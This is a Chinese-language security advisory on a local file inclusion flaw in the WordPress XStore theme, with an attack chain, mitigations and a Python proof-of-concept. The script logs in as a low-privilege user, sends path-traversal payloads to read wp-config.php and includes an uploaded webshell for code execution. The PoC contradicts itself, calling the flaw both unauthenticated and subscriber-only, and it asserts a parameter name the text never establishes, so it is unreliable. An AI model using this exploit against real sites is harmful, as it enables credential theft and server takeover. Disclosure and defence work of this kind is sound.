CVE-2025-11746：WordPress XStore主题本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-11746

漏洞类型

本地文件包含（LFI）/ 远程代码执行（RCE）

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress XStore主题（8theme）

漏洞概述

CVE-2025-11746是WordPress XStore主题中的一个高危本地文件包含（Local File Inclusion, LFI）漏洞。该漏洞存在于XStore主题的et_ajax_required_plugins_popup()函数中，影响所有9.5.4及以下版本。该漏洞允许具有Subscriber级别及以上权限的已认证攻击者通过构造恶意请求，在服务器上包含并执行任意.php文件。由于WordPress默认注册即可获得Subscriber级别权限，这意味着任何能够注册账号的用户均可利用此漏洞。

成功利用此漏洞后，攻击者可以执行任意PHP代码，从而绕过访问控制、获取敏感数据，或在能够上传.php文件的场景下实现完整的远程代码执行（RCE）。攻击者可进一步获取服务器控制权限，植入Web Shell，窃取数据库中的用户凭证、会话信息等敏感数据，或将服务器作为跳板进行内网横向移动。该漏洞的CVSS 3.1评分为8.8分，属于高危级别，其危害程度因攻击复杂度低、无需用户交互以及对机密性、完整性、可用性的全面影响而极为严重。

该漏洞由Wordfence安全团队的安全研究员发现并报告，披露日期为2025年10月15日。鉴于WordPress生态系统中XStore主题被广泛使用于电商网站（WooCommerce集成），该漏洞对在线商店和企业的数据安全构成重大威胁。建议所有使用XStore主题的用户立即检查并更新至修复版本。

技术细节

该漏洞的核心位于XStore主题的et_ajax_required_plugins_popup()函数中。该函数在处理AJAX请求时，未对用户可控的输入参数进行充分的验证和过滤，导致攻击者可以通过构造特殊的文件路径参数，利用PHP的include()或require()等文件包含函数加载服务器上的任意.php文件。

从技术实现来看，WordPress的AJAX处理机制通过admin-ajax.php统一处理前端发起的AJAX请求。当已认证用户（包括Subscriber级别）调用与et_ajax_required_plugins_popup相关的AJAX动作时，主题代码会将请求中的某个参数直接用于文件路径拼接，而未使用白名单机制或路径规范化处理（如basename()、realpath()验证等）。攻击者可以利用目录遍历序列（如../../../）配合绝对路径或相对路径，引用系统中的敏感文件（如wp-config.php），或在允许文件上传的场景下引用上传的恶意.php文件。

利用条件方面，攻击者需要具备有效的WordPress账户凭据（Subscriber级别），但由于WordPress默认开放用户注册或在多数站点上注册功能可用，该门槛极低。攻击者登录后，通过构造包含恶意路径的AJAX请求即可触发漏洞。一旦包含恶意PHP文件，其中的PHP代码将在WordPress的PHP进程上下文中执行，继承当前Web服务器的权限，从而实现完全的系统控制。

漏洞的根本原因在于开发者假设了AJAX回调中的参数是安全的，未遵循"永不信任用户输入"的安全原则，未对文件路径进行严格的验证和限制。

攻击链分析

STEP 1

步骤1：获取认证凭据

攻击者注册一个WordPress Subscriber级别账户，或利用已泄露/弱口令的现有低权限账户登录目标网站。

STEP 2

步骤2：构造恶意AJAX请求

攻击者构造包含恶意文件路径参数的AJAX请求，目标是admin-ajax.php的et_ajax_required_plugins_popup动作，参数中包含目录遍历序列（如../../../wp-config.php）或上传的恶意PHP文件路径。

STEP 3

步骤3：触发本地文件包含

通过已认证的会话发送恶意AJAX请求，触发XStore主题et_ajax_required_plugins_popup()函数中的文件包含逻辑，未经验证地将用户输入拼接到文件路径中。

STEP 4

步骤4：执行任意PHP代码

服务器端的include()函数加载并执行攻击者指定的.php文件，导致敏感文件泄露（如wp-config.php中的数据库凭据）或在文件上传场景下执行攻击者植入的Web Shell。

STEP 5

步骤5：获取服务器控制权

利用RCE能力，攻击者可以植入持久化后门、提取数据库内容、窃取用户凭证、进行内网横向移动，或将服务器纳入僵尸网络进行进一步攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11746 - XStore Theme Local File Inclusion PoC
# Vulnerability: Unauthenticated file inclusion via et_ajax_required_plugins_popup()
# Requirements: Subscriber-level WordPress account

import requests

# Target configuration
TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "subscriber_password"

# Step 1: Authenticate to WordPress and obtain session cookies
session = requests.Session()

login_data = {
    "log": USERNAME,
    "pwd": PASSWORD,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}

session.post(f"{TARGET_URL}/wp-login.php", data=login_data)

# Step 2: Exploit LFI via et_ajax_required_plugins_popup AJAX action
# The vulnerable parameter allows path traversal to include arbitrary .php files
lfi_payload = "../../../wp-config.php"

ajax_params = {
    "action": "et_ajax_required_plugins_popup",
    "file": lfi_payload  # Malicious file path parameter
}

response = session.post(
    f"{TARGET_URL}/wp-admin/admin-ajax.php",
    data=ajax_params
)

print("[*] Response status:", response.status_code)
print("[*] Response body:", response.text[:500])

# Alternative: Include a previously uploaded malicious PHP file
# If file upload is available, attacker can upload a PHP webshell
# and include it via the LFI vulnerability to achieve RCE
malicious_shell_path = "../../../wp-content/uploads/2025/10/shell.php"
ajax_params_shell = {
    "action": "et_ajax_required_plugins_popup",
    "file": malicious_shell_path
}

response_shell = session.post(
    f"{TARGET_URL}/wp-admin/admin-ajax.php",
    data=ajax_params_shell
)

print("[*] Shell execution response:", response_shell.text[:500])

影响范围

XStore主题 <= 9.5.4

防御指南

临时缓解措施

在无法立即升级XStore主题的情况下，建议采取以下临时缓解措施：1）通过WordPress后台暂时禁用XStore主题，或切换至默认主题（如Twenty Twenty-Four）；2）在Web服务器层面（如Nginx/Apache）配置规则，阻止对admin-ajax.php中action=et_ajax_required_plugins_popup的请求；3）通过Wordfence等WAF插件添加自定义规则，拦截包含目录遍历字符（如../）的AJAX请求参数；4）暂时禁用网站的用户注册功能，阻止攻击者获取新的Subscriber账户；5）审查现有Subscriber及以上用户账户的可疑活动日志，排查是否已被利用；6）限制PHP配置中的allow_url_include和allow_url_fopen选项，降低远程文件包含风险。